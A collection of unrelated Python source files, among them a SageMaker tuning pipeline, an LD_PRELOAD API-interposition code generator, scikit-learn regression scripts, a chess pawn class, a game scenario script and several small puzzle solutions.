s3_input_train = sagemaker.inputs.TrainingInput(
s3_data=s3_train_path, content_type="csv"
)
s3_input_validation = sagemaker.inputs.TrainingInput(
s3_data=s3_val_path, content_type="csv"
)
s3_output_path = "s3://{}/{}/{}/{}/{}/output".format(
BUCKET, MODEL_PREFIX, now, NUM_FEATURES, fold
)
# Load class imbalances
class_imbalance_path = CLASS_IMBALANCE_PATH_PATTERN.format(fold)
class_imbalances = load_class_imbalances(class_imbalance_path)
imb = class_imbalances[LABEL]
scale_pos_weight = float(imb[0]) / imb[1] # negative/positive
if fold == DATA_ALL:
data_channels = {"train": s3_input_train, "validation": s3_input_train}
else:
data_channels = {"train": s3_input_train, "validation": s3_input_validation}
tuner = train_hpo(
hyperparameter_ranges=HYPERPARAMETER_RANGES,
container=container,
execution_role=role,
instance_count=TRAIN_INSTANCE_COUNT,
instance_type=TRAIN_INSTANCE_TYPE,
output_path=s3_output_path,
sagemaker_session=sess,
eval_metric=EVALUATION_METRIC,
objective=OBJECTIVE,
objective_metric_name=OBJECTIVE_METRIC_NAME,
max_train_jobs=MAX_TRAIN_JOBS,
max_parallel_jobs=MAX_PARALLEL_JOBS,
scale_pos_weight=scale_pos_weight,
data_channels=data_channels,
)
# Get the hyperparameter tuner status at regular interval
val_auc, best_model_path = get_tuner_status_and_result_until_completion(
tuner, NUM_FEATURES, LABEL
)
train_results = [[LABEL, NUM_FEATURES, val_auc, best_model_path]]
train_results_path = TRAIN_RESULTS_PATH_PATTERN.format(fold)
train_results_dir = os.path.dirname(train_results_path)
if not os.path.exists(train_results_dir):
os.makedirs(train_results_dir)
df_results = pd.DataFrame(
train_results,
columns=["class", "num_features", "val_auc", "best_model_path"],
)
df_results.to_csv(train_results_path, index=False)
# Save the HPO tuning job summary data
job_name = tuner.latest_tuning_job.name
my_tuner = sagemaker.HyperparameterTuningJobAnalytics(job_name)
df = my_tuner.dataframe()
hpo_summary_path = HPO_SUMMARY_PATH_PATTERN.format(fold)
hpo_summary_dir = os.path.dirname(hpo_summary_path)
if not os.path.exists(hpo_summary_dir):
os.makedirs(hpo_summary_dir)
df.to_csv(hpo_summary_path, index=False)
print("HPO Trainings Successfully Completed!")
# TRAINING FOR ALL DATA...
print("Training the final model using all data...")
# Prepare the input train & validation data path
s3_train_path = "s3://{}/{}/{}/{}/train".format(
BUCKET, DATA_PREFIX, DATA_ALL, NUM_FEATURES
)
s3_input_train = sagemaker.inputs.TrainingInput(
s3_data=s3_train_path, content_type="csv"
)
s3_output_path = "s3://{}/{}/{}/{}/{}/output".format(
BUCKET, MODEL_PREFIX, now, NUM_FEATURES, DATA_ALL
)
# Load class imbalances
class_imbalance_path = CLASS_IMBALANCE_PATH_PATTERN.format(DATA_ALL)
class_imbalances = load_class_imbalances(class_imbalance_path)
imb = class_imbalances[LABEL]
scale_pos_weight = float(imb[0]) / imb[1] # negative/positive
data_channels = {"train": s3_input_train, "validation": s3_input_train}
df_hpo, hpo_all_path = get_best_hpo_jobs(HPO_SUMMARY_PATH_PATTERN, FOLDS, DATA_ALL)
params, val_auc = get_best_params(df_hpo, criteria=BEST_JOB_CRITERIA)
s3_model_path = train_model(
params=params,
container=container,
execution_role=role,
instance_count=TRAIN_INSTANCE_COUNT,
instance_type=TRAIN_INSTANCE_TYPE,
output_path=s3_output_path,
sagemaker_session=sess,
eval_metric=EVALUATION_METRIC,
objective=OBJECTIVE,
scale_pos_weight=scale_pos_weight,
data_channels=data_channels,
)
train_results_path = TRAIN_RESULTS_PATH_PATTERN.format(DATA_ALL)
columns = ["class", "num_features", "val_auc", "best_model_path"]
results = [[LABEL, NUM_FEATURES, val_auc, s3_model_path]]
df = pd.DataFrame(results, columns=columns)
df.to_csv(train_results_path, index=False)
print("Training Successfully Completed!")
|
"""
Views for Tutorial Page application.
"""
#from django.test import TestCase
# Create your tests here.
|
#!/usr/bin/python
from os.path import splitext, split
from pycparser import c_generator, c_ast, parse_file
from textwrap import dedent
from sys import argv, exit
class InvalidTemplateException(Exception):
""" A template file has been determined to be invalid during parsing. """
def __init__(self, msg):
self.msg = msg
def __str__(self):
return self.__repr__()
def __repr__(self):
return 'Invalid template file: {0}'.format(self.msg)
def audit(message):
""" Currently just a thin wrapper for print(). """
print(">>> {0}".format(message))
def group_replace(text, replacements):
""" Replaces every occurrence of each item in replacements in the given text. """
for match, replace in replacements:
text = text.replace(match, replace)
return text
class Interpose(object):
""" Generate and write out code for interposing API calls. The resulting library code can be
used to intercept API calls for the specified function signatures if it is loaded before
the original library. On linux, this is achieved with the following variable:
LD_PRELOAD=/path/to/lib.so
On OS X, use the following variables:
DYLD_FORCE_FLAT_NAMESPACE=1 DYLD_INSERT_LIBRARIES=/path/to/lib.dylib
"""
def __init__(self, dest, header, lib, templates, api):
self.dest = dest
self.header = header
self.lib = lib
self.api = api
_, self.header_base = split(self.header)
self.header_include = self.header_base
self.header_base = splitext(self.header_base)[0]
self.templates = {}
for t in templates:
type, name = t.split('=')
ext = splitext(splitext(name)[0])[1]
path = 'interpose_{0}_{1}{2}'.format(type, self.header_base, ext)
self.templates[type] = name, path
for i in '/etc/include/', '/usr/include/', '/usr/local/include/', '/opt/local/include/':
if header.find(i) == 0:
self.header_include = header[len(i):]
break
@staticmethod
def __extract_label(template, label):
""" Given the template string, "before{{LABEL:contents}}after", and the label, "LABEL", this
function would return the tuple ("before", "after", "contents").
"""
tag = '{{' + label
loc = template.find(tag)
if loc == -1:
return template, '', ''
col = template.find(':', loc + len(tag))
if col == -1:
end = template.find('}}')
if end == -1:
raise InvalidTemplateException("non-terminating '{0}' label".format(label))
return template[:loc], '', ''
cut = template[col + 1:]
stack = 2
c_pos = 0
found = False
for c in cut:
if c == '{':
stack += 1
elif c == '}':
stack -= 1
if stack == 0:
found = True
break
c_pos += 1
if not found:
raise InvalidTemplateException("non-terminating '{0}' label".format(label))
# Adjust for the terminating }} being two characters wide
return template[:loc], cut[c_pos + 1:], cut[:c_pos - 1]
def __replace_conditional(self, text, condition, truth):
while True:
pre, post, extract = Interpose.__extract_label(text, 'IF_' + condition)
if not extract:
break
text = '{0}{1}{2}'.format(pre, extract if truth else '', post)
return text
def __generate_code(self, template_file):
""" Fills out the provided template with this API. """
template = ''
with open(template_file, 'r') as f:
template = group_replace(
f.read(),
(('{{ORIGINAL_HEADER}}', self.header_include),
('{{USER_DEFINED_FUNCTIONS}}', self.templates['usr'][1]),
('{{APPLE_LIB_NAME}}', split(self.lib)[1])))
# Loop until we've filled all 'FOR_EACH_FUNCTION' templates
while True:
template_pre, template_post, label = self.__extract_label(template, 'FOR_EACH_FUNCTION')
if not label:
break
label = label.strip()
func_group = ''
for name, return_type, arg_names, arg_types, arg_list in self.api:
func_src = label
func_src = self.__replace_conditional(func_src, 'NONVOID', return_type != 'void')
func_src = self.__replace_conditional(func_src, 'VOID', return_type == 'void')
func_src = group_replace(
func_src,
(('{{NAME}}', name),
('{{RETURN_TYPE}}', return_type),
('{{ARGUMENT_NAMES}}', arg_names),
('{{ARGUMENT_TYPES}}', arg_types),
('{{ARGUMENT_LIST}}', arg_list),
('{{,ARGUMENT_NAMES}}', ', ' + arg_names if arg_names else ''),
('{{,ARGUMENT_TYPES}}', ', ' + arg_types if arg_types else ''),
('{{,ARGUMENT_LIST}}', ', ' + arg_list if arg_list else '')))
func_group += '\n{0}\n'.format(func_src)
template = '{0}{1}{2}'.format(template_pre, func_group.strip(), template_post)
return template
def write(self):
""" Write the generated code to their respective files. """
for key, value in self.templates.iteritems():
template_in, template_out = value
path = '{0}/{1}'.format(self.dest or '.', template_out)
audit("Writing: {0}".format(path))
with open(path, 'w') as f:
f.write(self.__generate_code(template_in))
class CGenerator(c_generator.CGenerator):
""" Generates C code from an AST. This is modified from the parent class to call _get_name()
when looking up the node name.
"""
def _get_name(self, n):
""" Returns the node name. This was split out from _generate_type() so that it could be
overridden independently.
"""
return n.declname or ''
def _generate_type(self, n, modifiers=[]):
""" Recursive generation from a type node. n is the type node. 'modifiers' collects the
PtrDecl, ArrayDecl and FuncDecl modifiers encountered on the way down to a TypeDecl, to
allow proper generation from it.
"""
typ = type(n)
if typ == c_ast.TypeDecl:
s = ''
if n.quals: s += ' '.join(n.quals) + ' '
s += self.visit(n.type)
nstr = self._get_name(n)
# Resolve modifiers.
# Wrap in parens to distinguish pointer to array and pointer to
# function syntax.
#
for i, modifier in enumerate(modifiers):
if isinstance(modifier, c_ast.ArrayDecl):
if (i != 0 and isinstance(modifiers[i - 1], c_ast.PtrDecl)):
nstr = '(' + nstr + ')'
nstr += '[' + self.visit(modifier.dim) + ']'
elif isinstance(modifier, c_ast.FuncDecl):
if (i != 0 and isinstance(modifiers[i - 1], c_ast.PtrDecl)):
nstr = '(' + nstr + ')'
nstr += '(' + self.visit(modifier.args) + ')'
elif isinstance(modifier, c_ast.PtrDecl):
if modifier.quals:
nstr = '* {0} {1}'.format(' '.join(modifier.quals), nstr)
else:
nstr = '*' + nstr
if nstr: s += ' ' + nstr
return s
elif typ == c_ast.Decl:
return self._generate_decl(n.type)
elif typ == c_ast.Typename:
return self._generate_type(n.type)
elif typ == c_ast.IdentifierType:
return ' '.join(n.names) + ' '
elif typ in (c_ast.ArrayDecl, c_ast.PtrDecl, c_ast.FuncDecl):
return self._generate_type(n.type, modifiers + [n])
else:
return self.visit(n)
class CGeneratorNoNames(CGenerator):
""" Like the parent class, but uses no names. """
def __init__(self):
super(CGeneratorNoNames, self).__init__()
def _get_name(self, n):
""" Returns an empty name. """
return ''
class CGeneratorForceNames(CGenerator):
""" Like the parent class, but forces names, even when none are defined. """
def __init__(self):
super(CGeneratorForceNames, self).__init__()
self.index = 0
def _get_name(self, n):
""" Returns the node name or 'argN', where N is the 1-based argument index. """
self.index += 1
return n.declname or 'arg{0}'.format(self.index)
def generate_names(args):
""" Yield names for the arguments, forcing 'argN' (where N is the 1-based argument index) when
an argument has no name.
"""
index = 0
for _, decl in args:
index += 1
yield decl.name or 'arg{0}'.format(index)
class FuncDeclVisitor(c_ast.NodeVisitor):
""" Walks every function declaration in the provided AST, appending each to a list. """
def __init__(self):
super(FuncDeclVisitor, self).__init__()
self.functions = []
def visit_Decl(self, node):
""" For each encountered function declaration, this function records the following tuple:
[0] function name
[1] return type
[2] comma-delimited argument names
[3] comma-delimited argument types
[4] comma-delimited argument names and types
"""
if type(node.type) == c_ast.FuncDecl:
func_name = node.name
return_type = CGeneratorNoNames()._generate_type(node.type.type)
arg_types = CGeneratorNoNames().visit(node.type.args) if node.type.args else ''
if arg_types == 'void':
arg_types = ''
arg_names = ', '.join(generate_names(node.type.args.children())) if arg_types else ''
arg_list = CGeneratorForceNames().visit(node.type.args) if arg_types else ''
self.functions.append((func_name, return_type, arg_names, arg_types, arg_list))
def parse_header(filename):
""" Parse the specified C header file and return a list of functions per FuncDeclVisitor. """
visitor = FuncDeclVisitor()
ast = parse_file(filename, use_cpp = True)
visitor.visit(ast)
return visitor.functions
def main(args):
try:
dest, header, lib, templates = args[1], args[2], args[3], args[4:]
interpose = Interpose(dest, header, lib, templates, api = parse_header(header))
interpose.write()
except InvalidTemplateException as e:
audit('[ERROR] {0}'.format(e))
return 1
else:
return 0
if __name__ == "__main__":
exit(main(argv))
|
"""Main.py."""
# import os
# import tarfile
# import subprocess
import pprint
# import pandas as pd
# import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_score
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.externals import joblib
from sklearn.model_selection import GridSearchCV
from prepared import training_data, test_data
housing_prepared, housing_labels = training_data()
strat_test_set = test_data()
def display_scores(scores, text_=''):
"""Display scores of model."""
print('\n\n------------------------------------')
print(text_)
print('Scoress:', scores)
print('Mean:', scores.mean())
print('Standred deviation:', scores.std())
print('\n\n')
# Training and Evaluating on the Training set
# Better Evaluation Using Cross-Validation
def decisiontreeregressor(prepared, labels):
"""DecisionTreeRegressor."""
tree_reg = DecisionTreeRegressor()
tree_reg.fit(prepared, labels)
joblib.dump(tree_reg, 'models/DecisionTreeRegressor.pkl')
tree_scores = cross_val_score(tree_reg, prepared, labels,
scoring="neg_mean_squared_error", cv=10)
tree_rmse_scores = np.sqrt(-tree_scores)
display_scores(tree_rmse_scores, text_="DecisionTreeRegressor")
def linearregression(prepared, labels):
"""linearregression."""
lin_reg = LinearRegression()
lin_reg.fit(prepared, labels)
joblib.dump(lin_reg, "models/Linearregression.pkl")
lin_scores = cross_val_score(lin_reg, prepared, labels,
scoring="neg_mean_squared_error", cv=10)
line_rmse_scores = np.sqrt(-lin_scores)
display_scores(line_rmse_scores, text_="LinearRegression")
def randomforestregressor(prepared, labels):
"""RandomForestRegressor."""
forest_reg = RandomForestRegressor()
forest_reg.fit(prepared, labels)
joblib.dump(forest_reg, 'models/RandomForestRegressor.pkl')
forest_scores = cross_val_score(forest_reg, prepared, labels,
scoring="neg_mean_squared_error", cv=10)
forest_rmse_scores = np.sqrt(-forest_scores)
display_scores(forest_rmse_scores, text_='RandomForestRegressor')
# Grid Search
def grid_search(prepared, labels):
"""Grid Search."""
params_grid = [
{'n_estimators': [3, 10, 30], 'max_features': [2, 4, 6, 8]},
{'bootstrap': [False], 'n_estimators': [3, 10], 'max_features': [2, 3, 4]},
]
forest_reg = RandomForestRegressor()
grid_search = GridSearchCV(forest_reg, params_grid, cv=5,
scoring='neg_mean_squared_error')
grid_search.fit(prepared, labels)
print('best_params_')
pprint.pprint(grid_search.best_params_)
print('best_estimator_')
pprint.pprint(grid_search.best_estimator_)
cvres = grid_search.cv_results_
for mean_score, params in zip(cvres['mean_test_score'], cvres['params']):
print(np.sqrt(-mean_score), params)
return grid_search
if __name__ == "__main__":
grid_search = grid_search(prepared=housing_prepared, labels=housing_labels)
joblib.dump(grid_search.best_estimator_, 'models/final.pkl')
|
file = open("example.txt",'a')
file.write("Line 4\n")
file.close()
# write has r,w,a and r+,w+,a+ modes; available in dox
|
from .piece import Piece
from game_rules import can_move
from game_state import GameState
import os
class Pawn(Piece):
# add boundary checking functions
def __init__(self, color, name):
self.sprite_dir = color + "Pawn.png"
self.name = name
self.color=color
super(Pawn,self).__init__(color,name)
def get_possible_moves(self, coord, matrix):
list_aux = can_move(self.color, matrix, coord)
self.possible_moves=[]
self.mov_d(coord, matrix)
self.mov_v(coord, matrix)
if (GameState.possible_en_passant):
self.check_en_passant(coord, matrix)
###print("possible_moves", self.possible_moves)
###print("list_aux", list_aux)
if (list_aux):
return [move for move in list_aux if move in self.possible_moves] # falhando, pois peão está há 2 ataques de distância do rei
return self.possible_moves
def mov_v(self, coord, matrix):
######print(first_move)
if (self.color == 'white'):
self.check_upper_edge(coord, matrix)
else:
self.check_lower_edge(coord, matrix)
def mov_d(self, coord, matrix):
######print(first_move)
if (self.color == 'white'):
self.check_upper_left_edge(coord, matrix)
self.check_upper_right_edge(coord, matrix)
else:
self.check_lower_left_edge(coord, matrix)
self.check_lower_right_edge(coord, matrix)
def check_en_passant(self, coord, matrix):
if (coord[1]-1>=0 and (coord[0], coord[1]-1) == GameState.possible_en_passant):
if matrix[coord]['piece'].color == 'white':
self.possible_moves.append((coord[0]-1, coord[1]-1, 'mov'))
else:
self.possible_moves.append((coord[0]+1, coord[1]-1, 'mov'))
elif (coord[1]+1<=7 and (coord[0], coord[1]+1) == GameState.possible_en_passant):
if matrix[coord]['piece'].color =='white':
self.possible_moves.append((coord[0]-1, coord[1]+1, 'mov'))
else:
self.possible_moves.append((coord[0]+1, coord[1]+1, 'mov'))
def check_upper_edge(self, coord, matrix):
if (coord[0]-1>=0):
front_piece = matrix[(coord[0]-1,coord[1])]['piece']
if (not front_piece):
self.possible_moves.append((coord[0]-1,coord[1],'mov'))
if not self.was_moved_before:
i=0
while(i<2):
if(coord[0]-(i+1)>=0): # limite superior
front_piece = matrix[(coord[0]-(i+1),coord[1])]['piece'] # ⬆⬆⬆
if (not front_piece):
self.possible_moves.append((coord[0]-(i+1),coord[1],'mov'))
i+=1
else:
i=2
else:
i=2
def check_lower_edge(self, coord, matrix):
if (coord[0]+1<=7):
bottom_piece = matrix[(coord[0]+1,coord[1])]['piece']
if (not bottom_piece):
self.possible_moves.append((coord[0]+1,coord[1],'mov'))
if (not self.was_moved_before):
i=0
while(i<2):
if(coord[0]+(i+1)<=7): #limite inferior
front_piece=matrix[(coord[0]+(i+1),coord[1])]['piece']#⬇⬇⬇
if (not front_piece):
self.possible_moves.append((coord[0]+(i+1),coord[1],'mov'))
i+=1
else:
i=2
else:
i=2
def check_upper_right_edge(self, coord, matrix):
if (coord[1]!=7 and coord[0]!=0):
front_right_piece = matrix[(coord[0]-1,coord[1]+1)]['piece']
if (front_right_piece and front_right_piece.color != self.color):
self.possible_moves.append((coord[0]-1,coord[1]+1,'mov'))
def check_upper_left_edge(self, coord, matrix):
if (coord[1]!=0 and coord[0]!=0):
front_left_piece = matrix[(coord[0]-1,coord[1]-1)]['piece']
if (front_left_piece and front_left_piece.color != self.color):
self.possible_moves.append((coord[0]-1,coord[1]-1,'mov'))
def check_lower_right_edge(self, coord, matrix):
if (coord[1]!=7 and coord[0]!=7):
bottom_right_piece = matrix[(coord[0]+1,coord[1]+1)]['piece']
if (bottom_right_piece and bottom_right_piece.color != self.color):
self.possible_moves.append((coord[0]+1,coord[1]+1,'mov'))
def check_lower_left_edge(self, coord, matrix):
if (coord[1]!=0 and coord[0]!=7):
bottom_left_piece = matrix[(coord[0]+1,coord[1]-1)]['piece']
if(bottom_left_piece and bottom_left_piece.color != self.color):
self.possible_moves.append((coord[0]+1,coord[1]-1,'mov')) |
# Author : Xiang Xu
# -*- coding: utf-8 -*-
def getCheckinTimes(infile, outfile):
inf = open(infile, 'r')
outf = open(outfile, 'w')
uid = ''
count = 0
outline = ''
for line in inf:
line = line.strip()
token = line.split('\t')
if token[0] != uid:
if outline:
outf.write(outline + str(count) + '\n')
uid = token[0]
count = 1
outline = uid + '\t'
else:
count += 1
outf.write(outline + str(count) + '\n')
inf.close()
outf.close()
def getFriends(infile, outfile):
inf = open(infile, 'r')
outf = open(outfile, 'w')
uid = ''
outline = ''
for line in inf:
line = line.strip()
token = line.split('\t')
if token[0] != uid:
if outline:
outf.write(outline + '\n')
uid = token[0]
outline = (uid + '\t' + token[1])
else:
outline += (' ' + token[1])
outf.write(outline + '\n')
inf.close()
outf.close()
if __name__ == '__main__':
getCheckinTimes('Gowalla_totalCheckins.txt', 'checkintimes.txt')
getFriends('Gowalla_edges.txt', 'friends.txt')
|
# Print all the words that appear in the text, one for each
# line. Words should be sorted in descending order of the
# number of occurrences in the text.
with open('input.txt') as inFile:
myFile = inFile.readlines()
myDict = {}
ans = {}
ans1 = []
for line in myFile:
myLine = line.split()
for word in myLine:
myDict[word] = myDict.get(word, 0) + 1
sorted_dict = sorted(myDict, key=lambda x: (-myDict[x], x))
print('\n'.join(sorted_dict))
|
import os
import os.path as op
import sys
import json
appengine_path = op.expanduser('~/dev/google_appengine')
sys.path.append(appengine_path)
import dev_appserver
dev_appserver.fix_sys_path() # otherwise fancy_urllib will not be found
service_account_key_path = op.join(op.abspath('.'), 'service_account_key.json')
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = service_account_key_path
from google.appengine.ext.remote_api import remote_api_stub
from main import Log
project_id = project_id = json.load(open('../project_ids.json'))['remote-api']
remote_api_stub.ConfigureRemoteApiForOAuth(
'%s.appspot.com' % project_id,
'/_ah/remote_api')
from main import Log
print [l.text for l in Log.query().order(Log.date)]
|
from ED6ScenarioHelper import *
def main():
# 玛鲁加山道
CreateScenaFile(
FileName = 'R0300 ._SN',
MapName = 'Rolent',
Location = 'R0300.x',
MapIndex = 21,
MapDefaultBGM = "ed60022",
Flags = 0,
EntryFunctionIndex = 0xFFFF,
Reserved = 0,
IncludedScenario = [
'',
'',
'',
'',
'',
'',
'',
''
],
)
BuildStringList(
'@FileName', # 8
'洛连特方向', # 9
'玛鲁加矿山方向', # 10
'跳跳猫', # 11
'爆种铃兰', # 12
'跳跳猫', # 13
'爆种铃兰', # 14
'爆种铃兰', # 15
)
DeclEntryPoint(
Unknown_00 = -204000,
Unknown_04 = 10,
Unknown_08 = -156840,
Unknown_0C = 4,
Unknown_0E = 0,
Unknown_10 = 0,
Unknown_14 = 9500,
Unknown_18 = -10000,
Unknown_1C = 0,
Unknown_20 = 0,
Unknown_24 = 0,
Unknown_28 = 2800,
Unknown_2C = 262,
Unknown_30 = 45,
Unknown_32 = 0,
Unknown_34 = 360,
Unknown_36 = 0,
Unknown_38 = 0,
Unknown_3A = 21,
InitScenaIndex = 0,
InitFunctionIndex = 0,
EntryScenaIndex = 0,
EntryFunctionIndex = 1,
)
AddCharChip(
'ED6_DT09/CH10020 ._CH', # 00
'ED6_DT09/CH10021 ._CH', # 01
'ED6_DT09/CH10180 ._CH', # 02
'ED6_DT09/CH10181 ._CH', # 03
'ED6_DT09/CH10260 ._CH', # 04
'ED6_DT09/CH10261 ._CH', # 05
'ED6_DT09/CH10210 ._CH', # 06
'ED6_DT09/CH10211 ._CH', # 07
)
AddCharChipPat(
'ED6_DT09/CH10020P._CP', # 00
'ED6_DT09/CH10021P._CP', # 01
'ED6_DT09/CH10180P._CP', # 02
'ED6_DT09/CH10181P._CP', # 03
'ED6_DT09/CH10260P._CP', # 04
'ED6_DT09/CH10261P._CP', # 05
'ED6_DT09/CH10210P._CP', # 06
'ED6_DT09/CH10211P._CP', # 07
)
DeclNpc(
X = -204120,
Z = -20,
Y = -168420,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0xFF,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -205010,
Z = 5940,
Y = -5850,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0xFF,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclMonster(
X = -209000,
Z = 1000,
Y = -140000,
Unknown_0C = 0,
Unknown_0E = 0,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0x65,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -232000,
Z = 4000,
Y = -91000,
Unknown_0C = 150,
Unknown_0E = 2,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0x67,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -232000,
Z = 6000,
Y = -81000,
Unknown_0C = 0,
Unknown_0E = 0,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0x66,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -211000,
Z = 6000,
Y = -78000,
Unknown_0C = 332,
Unknown_0E = 2,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0x68,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -193000,
Z = 4000,
Y = -45000,
Unknown_0C = 279,
Unknown_0E = 2,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0x70,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclActor(
TriggerX = -183530,
TriggerZ = 3930,
TriggerY = -44100,
TriggerRange = 1000,
ActorX = -182870,
ActorZ = 3930,
ActorY = -44100,
Flags = 0x7C,
TalkScenaIndex = 0,
TalkFunctionIndex = 2,
Unknown_22 = 0,
)
ScpFunction(
"Function_0_1DA", # 00, 0
"Function_1_1E0", # 01, 1
"Function_2_20C", # 02, 2
)
def Function_0_1DA(): pass
label("Function_0_1DA")
ClearMapFlags(0x8000000)
Return()
# Function_0_1DA end
def Function_1_1E0(): pass
label("Function_1_1E0")
OP_16(0x2, 0xFA0, 0xFFFAD7B0, 0xFFFCA4A0, 0x3000E)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x53, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_204")
OP_6F(0x0, 0)
Jump("loc_20B")
label("loc_204")
OP_6F(0x0, 60)
label("loc_20B")
Return()
# Function_1_1E0 end
def Function_2_20C(): pass
label("Function_2_20C")
SetMapFlags(0x8000000)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x53, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_307")
OP_22(0x2B, 0x0, 0x64)
OP_70(0x0, 0x3C)
Sleep(500)
Jc((scpexpr(EXPR_EXEC_OP, "OP_3E(0x1FC, 1)"), scpexpr(EXPR_END)), "loc_286")
FadeToDark(300, 0, 100)
OP_22(0x11, 0x0, 0x64)
SetMessageWindowPos(-1, -1, -1, -1)
SetChrName("")
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x0),
"得到了\x07\x02",
"复苏药\x07\x00",
"。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
SetMessageWindowPos(72, 320, 56, 3)
FadeToBright(300, 0)
OP_A2(0x29A)
Jump("loc_304")
label("loc_286")
FadeToDark(300, 0, 100)
SetChrName("")
AnonymousTalk(
(
"宝箱里装有\x07\x02",
"复苏药\x07\x00",
"。\x01",
"不过现有的数量太多,\x07\x02",
"复苏药\x07\x00",
"不能再拿更多了。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
OP_22(0x2C, 0x0, 0x64)
OP_6F(0x0, 60)
OP_70(0x0, 0x0)
label("loc_304")
Jump("loc_365")
label("loc_307")
FadeToDark(300, 0, 100)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"宝箱里什么东西都没有。\x07\x00\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
OP_83(0xF, 0x7A)
label("loc_365")
Sleep(30)
TalkEnd(0xFF)
ClearMapFlags(0x8000000)
Return()
# Function_2_20C end
SaveToFile()
Try(main)
|
import tkinter as tk
def textUpdate():
label.configure(text=entry.get())
def scaleUpdate(e):
label.configure(font=("", e))
root = tk.Tk()
label = tk.Label(root)
label.pack()
entry = tk.Entry(root)
entry.pack()
tk.Button(root, text="Update", command=textUpdate).pack()
tk.Scale(root, orient = 'h', from_ = 10, to = 50,
command=scaleUpdate).pack(fill=tk.X)
root.mainloop()
|
# AdventOfCode 2019 day 2 pt 1
# https://adventofcode.com/2019/day/2
# start 7:19am
# started over at 7:37am confused af
# solved pt 1 8:19am
#
# AdventOfCode 2019 day 2 pt 2
# start pt2 8:55 - paused 9:30
# unpaused 13:30
# solved pt2 13:50
def calcPt1(intcode):
i = 0
while i < len(intcode):
opcode = intcode[i]
if opcode == 99: break
if opcode == 1:
pos_one = intcode[i + 1]
pos_two = intcode[i + 2]
pos_three = intcode[i + 3]
opcode_one = intcode[pos_one] + intcode[pos_two]
intcode[pos_three] = opcode_one
# print("op1", opcode, pos_one, pos_two, pos_three, opcode_one, intcode[pos_three], intcode)
elif opcode == 2:
pos_one = intcode[i + 1]
pos_two = intcode[i + 2]
pos_three = intcode[i + 3]
opcode_two = intcode[pos_one] * intcode[pos_two]
intcode[pos_three] = opcode_two
# print("op2", opcode, pos_one, pos_two, pos_three, opcode_one, intcode[pos_three], intcode)
i += 4
return intcode
filepath = 'input_2019-2.txt'
with open(filepath) as fp:
originalintcode = [int(x) for x in fp.readline().split(",")]
intcode = [x for x in originalintcode]
intcode[1] = 12
intcode[2] = 2
result = calcPt1(intcode)
print(result[0]) # 3716250
# pt 2
for noun in range(100):
for verb in range(100):
xintcode = [x for x in originalintcode]
xintcode[1] = noun
xintcode[2] = verb
result = calcPt1(xintcode)
if result[0] == 19690720:
print( (100*noun)+verb ) # 6472
break
|
#!/usr/bin/python3
"""main.py: Holds the boilerplate code to show that this code solves
the 8 queens problem
"""
from queen import Queen
def main():
"""main: Code to show the 8 queens problem being solved
"""
for i in range(8):
solver = Queen(8)
print("Solution {0} - {1}".format(i + 1, solver.place_queen(i)))
main()
|
INTRODUCTION = """# Coding Problems
This repository contains my solutions for various competitive programming problems.
Note: Not all source code offers a valid solution (yet). Most code does.
"""
from pathlib import Path
import re
ROOTS = {
"advent-of-code": Path("./problems/advent-of-code"),
"codechef": Path("./problems/codechef"),
"kattis": Path("./problems/kattis"),
}
LANGUAGES = ["cpp", "py"]
def markdownRow(cells):
return "|" + "|".join(map(str, cells)) + "|"
class Problem:
def __init__(self, location: Path):
self.title = location.parts[-2]
self.language = location.suffix
self.location = location
self.header = ["day", "language", "location"]
self.language_icon = ""
if self.language == ".py":
self.language_icon = f""
elif self.language == ".cpp":
self.language_icon = f""
def getHeader(self):
return markdownRow(self.header)
def __str__(self):
return markdownRow(
[
self.title,
self.language,
f"[{self.language_icon}]({self.location})",
]
)
class AdventOfCodeProblem(Problem):
def __init__(self, location1: Path, location2: Path):
super().__init__(location1)
self.location1 = f"[{self.language_icon}]({location1})"
self.location2 = f"[{self.language_icon}]({location2})" if location2 else "N/A"
self.year = location1.parts[-3]
self.day = location1.parts[-2]
self.url = f"https://adventofcode.com/{self.year}/day/{self.day.lstrip('0')}"
self.header = ["year", "day", "part1", "part2", "url"]
def getHeader(self):
return markdownRow(self.header)
def __str__(self):
return markdownRow(
[
self.year,
self.day,
self.location1,
self.location2,
f"[<img src='https://adventofcode.com/favicon.png' width='24' height='24'>]({self.url})",
]
)
class CodeChefProblem(Problem):
def __init__(self, location: Path):
super().__init__(location)
self.url = f"https://www.codechef.com/submit/{self.title}"
